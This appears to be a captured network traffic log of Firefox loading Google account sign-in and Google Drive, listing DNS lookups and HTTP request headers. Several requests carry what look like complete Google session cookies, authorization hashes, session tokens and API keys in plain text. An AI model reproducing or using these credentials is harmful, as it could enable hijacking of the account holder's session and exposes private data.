www3.l.google.com

IN AAAA

Response

www3.l.google.com

IN AAAA

2a00:1450:4009:815::200e
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com

IN AAAA

2a00:1450:4009:81d::200e
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com

IN AAAA

2a00:1450:4009:81d::200e
POST

https://play.google.com/log?format=json&hasfast=true&authuser=0

firefox.exe

Remote address:

142.250.179.238:443

Request

POST /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://accounts.google.com/
x-goog-authuser: 0
content-type: application/x-www-form-urlencoded;charset=utf-8
content-length: 419
origin: https://accounts.google.com
cookie: NID=520=dGwT782ItQw7wAIUO2p_w_9WIf5CQencZTI5F1U5fs1a6Mt5610ietS-xRqf9mULDiTEI8hZttYA_SemYb4yue3MshhY9pSCPpQ2MTrgud5I3ez6RiaaCcKM6_kAEZRIx2I4aNtZLMysVIPCuipMGCT36x73Z2JL8xaKGqTIjtCZ55Sp1MhYPQqndg
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
POST

https://play.google.com/log?format=json&hasfast=true&authuser=0

firefox.exe

Remote address:

142.250.179.238:443

Request

POST /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://accounts.google.com/
x-goog-authuser: 0
content-type: application/x-www-form-urlencoded;charset=utf-8
content-length: 419
origin: https://accounts.google.com
cookie: NID=520=dGwT782ItQw7wAIUO2p_w_9WIf5CQencZTI5F1U5fs1a6Mt5610ietS-xRqf9mULDiTEI8hZttYA_SemYb4yue3MshhY9pSCPpQ2MTrgud5I3ez6RiaaCcKM6_kAEZRIx2I4aNtZLMysVIPCuipMGCT36x73Z2JL8xaKGqTIjtCZ55Sp1MhYPQqndg
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

firefox.exe

Remote address:

142.250.179.238:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
referer: https://accounts.google.com/
origin: https://accounts.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

firefox.exe

Remote address:

142.250.179.238:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
referer: https://accounts.google.com/
origin: https://accounts.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
GET

https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2cvOE5%2BREkIkTeWl8pJjhWDKp2uaafLoo8cojqFbhekKdU44eU5NY%2BRIcEMF3kpvTLjKuYBmqsec6lnwaTwu2LMTewxQTEobUY4bx7Eii%2BSTEguxM1MScBGB4QdbWwNuqY6Y/7/n9AApz5Vb1KVoRL03f%2B5/RbNTOyGJ1EVJzGQxvQ8mUdnRHHkRcWr0AV6QBYPjl3NWBIKyJ2aSrXn%2BNaafoQQRp7XI0lVBATyWhts0CPjguAiMD60tu2MUxw58W1khETRhN/%2BXaMXbVLQhfpJmDtedggm8swA7s94Oiw6o1erBD34TlIak14JgOwTO%2BZ1Tu2Y11wsYL/d2S%2Bqw4K1dmzlGmz6qaONx69xMCooTIygLBy7YrzVGI6UCmRWJxrGnq46Y2aueAPPBrRjuRTePHsPc0BZAY8wxRHYdmRknhAWRhNI5I2wefH2HRstCP7I9F35JVZfUhYwUVL608s1%2Bg/EeDgPBZb/XEsYIGTqwb75pFYvitTuZN0W3TlN1IO07DMSxqNGi8sLBN2%2Bnr77L7bL4F6zE5pe1Q1qtOtxv7niVLCQ/IOt2OihCnE9dDLpkzO%2B0snMovZit0GsTk5SXB%2BU5yvF6d/c717y%2BoSQOOftUYZBVV2zpA%2BadsLnevrEk/6gC9wPjljo0llumEMyFz8f%2BPzOnEQPfAH9ZgXlu9vDayOVCycK7/7sE0UBAQ75w5sYmEKBt6YB9Aj7wSRPVMlWNoFIxEOciWK2Ict1t7Ox9HfIBJ6jbEOYlMElwqSHYslFZ&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDlNCKA4_v2sX8NpOmwOsKr_1xAJAn291PGqfFYhszukOXq-xndE-vF09hJtLm41wNF5zKV1

firefox.exe

Remote address:

142.250.178.14:443

Request

GET /accounts/SetSID?ssdc=1&sidt=ALWU2cvOE5%2BREkIkTeWl8pJjhWDKp2uaafLoo8cojqFbhekKdU44eU5NY%2BRIcEMF3kpvTLjKuYBmqsec6lnwaTwu2LMTewxQTEobUY4bx7Eii%2BSTEguxM1MScBGB4QdbWwNuqY6Y/7/n9AApz5Vb1KVoRL03f%2B5/RbNTOyGJ1EVJzGQxvQ8mUdnRHHkRcWr0AV6QBYPjl3NWBIKyJ2aSrXn%2BNaafoQQRp7XI0lVBATyWhts0CPjguAiMD60tu2MUxw58W1khETRhN/%2BXaMXbVLQhfpJmDtedggm8swA7s94Oiw6o1erBD34TlIak14JgOwTO%2BZ1Tu2Y11wsYL/d2S%2Bqw4K1dmzlGmz6qaONx69xMCooTIygLBy7YrzVGI6UCmRWJxrGnq46Y2aueAPPBrRjuRTePHsPc0BZAY8wxRHYdmRknhAWRhNI5I2wefH2HRstCP7I9F35JVZfUhYwUVL608s1%2Bg/EeDgPBZb/XEsYIGTqwb75pFYvitTuZN0W3TlN1IO07DMSxqNGi8sLBN2%2Bnr77L7bL4F6zE5pe1Q1qtOtxv7niVLCQ/IOt2OihCnE9dDLpkzO%2B0snMovZit0GsTk5SXB%2BU5yvF6d/c717y%2BoSQOOftUYZBVV2zpA%2BadsLnevrEk/6gC9wPjljo0llumEMyFz8f%2BPzOnEQPfAH9ZgXlu9vDayOVCycK7/7sE0UBAQ75w5sYmEKBt6YB9Aj7wSRPVMlWNoFIxEOciWK2Ict1t7Ox9HfIBJ6jbEOYlMElwqSHYslFZ&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDlNCKA4_v2sX8NpOmwOsKr_1xAJAn291PGqfFYhszukOXq-xndE-vF09hJtLm41wNF5zKV1 HTTP/2.0
host: accounts.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://accounts.google.com/
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
sec-fetch-user: ?1
te: trailers
DNS

accounts.google.co.uk

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.google.co.uk

IN A

Response

accounts.google.co.uk

IN CNAME

accounts-cctld.l.google.com

accounts-cctld.l.google.com

IN A

66.102.1.94
DNS

accounts.google.co.uk

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.google.co.uk

IN A

Response

accounts.google.co.uk

IN CNAME

accounts-cctld.l.google.com

accounts-cctld.l.google.com

IN A

66.102.1.94
GET

https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2cvQ7nejkyvoeXft7FL1DAEddSkZHo%2BT6iwYH8Cl//i3LsPH%2Bf8YjDJbxbjjT88xQDu3Bx2h%2BDRYDoN15dvtZvODIUm0b9Po7Bj1BWCtYqlgJe1PTn0mwcxnAo8KWDawQgwgBgi%2BLkFSYuFRSrUB0umcoUiBjZorM2B/1kl023LQv%2BNCm85SU%2BBBxjtyPdyPn75Q/IEPyWY46e7qKX7UngKCa0cU8pqdXotzIVk15aiD6%2BnckFyoBCP%2BtEpPIG35qewm5vSFhQAA%2BxUg1M8RKc4FYbXQgyZM5ih%2B4lP2oJ/nY6fcl2XBpWTtqgVVBJ8HJYI4OSCfTHMiOYEyybBBHNKVdYq9NuoCTMJWFw%2B64P4y9F6P8wvDW8ke/ES6ZbJwgHF1ilQXOf6hEmURQdxDWNYB0O9XVCxc17gPgj7ZYEpRkyQSS6IfcT%2B8Jx2w6Y6YrfUFLZjA30vkXc2/6vjwGyOwuRywp0q0uJlKYZI3YBE6LuIR4K6M9ew8qbV90pjG7fYF%2BkFzkBmgOWO2HNYGItEYncwBNGJXujKs1XPxxcRQxYNDS8eA78g8EJAbkZXi8GgzihRo3wG%2BTWeoBBXQEPx82C4JglFttd3XCllE304%2BnXuLIKP8emzLPTkGOBeAHGx5CuFojjRARUQ6ZuuoKXX0M35SOzINDc5ABA0uGZd%2BOF86CviJFRTArbpsv/DeujYqcW5ipB/1vhNpzEGE1b5V0O6bsYIRq1vB1Z2E4eHo%2BwKKsPGhCdq2Rx4tCkhycVTvsEfc&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDnomaTisEG-QepVkzsfWxUEAv16Oq5jPQdWGSuqN51A5KLQH7dWy0eUaxzRyKaKfFX8ocWF

firefox.exe

Remote address:

66.102.1.94:443

Request

GET /accounts/SetSID?ssdc=1&sidt=ALWU2cvQ7nejkyvoeXft7FL1DAEddSkZHo%2BT6iwYH8Cl//i3LsPH%2Bf8YjDJbxbjjT88xQDu3Bx2h%2BDRYDoN15dvtZvODIUm0b9Po7Bj1BWCtYqlgJe1PTn0mwcxnAo8KWDawQgwgBgi%2BLkFSYuFRSrUB0umcoUiBjZorM2B/1kl023LQv%2BNCm85SU%2BBBxjtyPdyPn75Q/IEPyWY46e7qKX7UngKCa0cU8pqdXotzIVk15aiD6%2BnckFyoBCP%2BtEpPIG35qewm5vSFhQAA%2BxUg1M8RKc4FYbXQgyZM5ih%2B4lP2oJ/nY6fcl2XBpWTtqgVVBJ8HJYI4OSCfTHMiOYEyybBBHNKVdYq9NuoCTMJWFw%2B64P4y9F6P8wvDW8ke/ES6ZbJwgHF1ilQXOf6hEmURQdxDWNYB0O9XVCxc17gPgj7ZYEpRkyQSS6IfcT%2B8Jx2w6Y6YrfUFLZjA30vkXc2/6vjwGyOwuRywp0q0uJlKYZI3YBE6LuIR4K6M9ew8qbV90pjG7fYF%2BkFzkBmgOWO2HNYGItEYncwBNGJXujKs1XPxxcRQxYNDS8eA78g8EJAbkZXi8GgzihRo3wG%2BTWeoBBXQEPx82C4JglFttd3XCllE304%2BnXuLIKP8emzLPTkGOBeAHGx5CuFojjRARUQ6ZuuoKXX0M35SOzINDc5ABA0uGZd%2BOF86CviJFRTArbpsv/DeujYqcW5ipB/1vhNpzEGE1b5V0O6bsYIRq1vB1Z2E4eHo%2BwKKsPGhCdq2Rx4tCkhycVTvsEfc&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDnomaTisEG-QepVkzsfWxUEAv16Oq5jPQdWGSuqN51A5KLQH7dWy0eUaxzRyKaKfFX8ocWF HTTP/2.0
host: accounts.google.co.uk
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://accounts.google.com/
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
sec-fetch-user: ?1
te: trailers
DNS

accounts-cctld.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts-cctld.l.google.com

IN A

Response

accounts-cctld.l.google.com

IN A

66.102.1.94
DNS

accounts-cctld.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts-cctld.l.google.com

IN AAAA

Response

accounts-cctld.l.google.com

IN AAAA

2a00:1450:400c:c06::5e
DNS

accounts-cctld.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts-cctld.l.google.com

IN AAAA

Response

accounts-cctld.l.google.com

IN AAAA

2a00:1450:400c:c06::5e
DNS

ssl.gstatic.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.gstatic.com

IN A

Response

ssl.gstatic.com

IN A

142.250.200.3
DNS

ssl.gstatic.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.gstatic.com

IN AAAA

Response

ssl.gstatic.com

IN AAAA

2a00:1450:4009:822::2003
DNS

lh2.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh2.l.google.com

IN AAAA

Response

lh2.l.google.com

IN AAAA

2a00:1450:4009:80b::200e
DNS

lh2.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh2.l.google.com

IN AAAA

Response

lh2.l.google.com

IN AAAA

2a00:1450:4009:80b::200e
DNS

lh3.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh3.google.com

IN A

Response

lh3.google.com

IN CNAME

lh2.l.google.com

lh2.l.google.com

IN A

216.58.212.238
DNS

lh2.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh2.l.google.com

IN A

Response

lh2.l.google.com

IN A

216.58.212.238
DNS

lh2.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh2.l.google.com

IN A
GET

https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png

firefox.exe

Remote address:

142.250.200.3:443

Request

GET /images/branding/product/1x/drive_2020q4_48dp.png HTTP/2.0
host: ssl.gstatic.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://drive.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo

firefox.exe

Remote address:

216.58.212.238:443

Request

GET /u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo HTTP/2.0
host: lh3.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=DZ18eMQZht2fCykakM_hyvQyRcLWcHHcBYj2eSa70b-ce43a8FUTrxK1aMd1CKnlEkohmC90YH1OyWWlnMjkbLB_YCSHbvSTP05EewRO1FR1erN0_AUQzNsVAyemQeNDgucwyVD8M4FUtUei93osbNP9z0pGYsR2To35EIxFPUIn0YA_3qlrUHLCd9HOtbWuhnw
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzWxG-mszgCHWeQ5I9FnokS5i0ku19Xhs4jcuAfwNy-hu-JwWrXQZV9XrVWOyyA-3-brwQ
cookie: __Secure-1PSIDCC=AKEyXzU9seN4zpWwaHPZR6WNskO_OOM6UW-hlCRKWcm1JOFllHGZCO65qro9DzTlDAR3gUWp3A
cookie: __Secure-3PSIDCC=AKEyXzXBOBb2GIm8Q0AS3aJzhr6w7-pbsHyMNiZvd--Qadyx7p7SspXiQ1C3n-RIXnZ3xoBdiw
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-site
te: trailers
DNS

drive-thirdparty.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive-thirdparty.googleusercontent.com

IN A

Response

drive-thirdparty.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients6.google.com

IN A

Response

clients6.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
DNS

clients.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients.l.google.com

IN A

Response

clients.l.google.com

IN A

142.250.187.238
DNS

clients.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients.l.google.com

IN A

Response

clients.l.google.com

IN A

142.250.187.238
GET

https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=efxltteqc1lr&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.238:443

Request

GET /drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=efxltteqc1lr&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-goog-ext-525001598-jspb: W1szMDEsMSxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxbMl1dXQ==
x-goog-drive-client-version: drive.web-frontend_20250106.13_p1
authorization: SAPISIDHASH 1736791506_a883ad65aac744a73dbd35bf5103c5acbce86d4a_u SAPISID1PHASH 1736791506_a883ad65aac744a73dbd35bf5103c5acbce86d4a_u SAPISID3PHASH 1736791506_a883ad65aac744a73dbd35bf5103c5acbce86d4a_u
x-goog-authuser: 0
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=DZ18eMQZht2fCykakM_hyvQyRcLWcHHcBYj2eSa70b-ce43a8FUTrxK1aMd1CKnlEkohmC90YH1OyWWlnMjkbLB_YCSHbvSTP05EewRO1FR1erN0_AUQzNsVAyemQeNDgucwyVD8M4FUtUei93osbNP9z0pGYsR2To35EIxFPUIn0YA_3qlrUHLCd9HOtbWuhnw
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzWxG-mszgCHWeQ5I9FnokS5i0ku19Xhs4jcuAfwNy-hu-JwWrXQZV9XrVWOyyA-3-brwQ
cookie: __Secure-1PSIDCC=AKEyXzU9seN4zpWwaHPZR6WNskO_OOM6UW-hlCRKWcm1JOFllHGZCO65qro9DzTlDAR3gUWp3A
cookie: __Secure-3PSIDCC=AKEyXzXBOBb2GIm8Q0AS3aJzhr6w7-pbsHyMNiZvd--Qadyx7p7SspXiQ1C3n-RIXnZ3xoBdiw
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=efxltteqc1lr&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.238:443

Request

OPTIONS /drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=efxltteqc1lr&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: authorization,x-goog-authuser,x-goog-drive-client-version,x-goog-ext-525001598-jspb
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://clients6.google.com/drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg

firefox.exe

Remote address:

142.250.187.238:443

Request

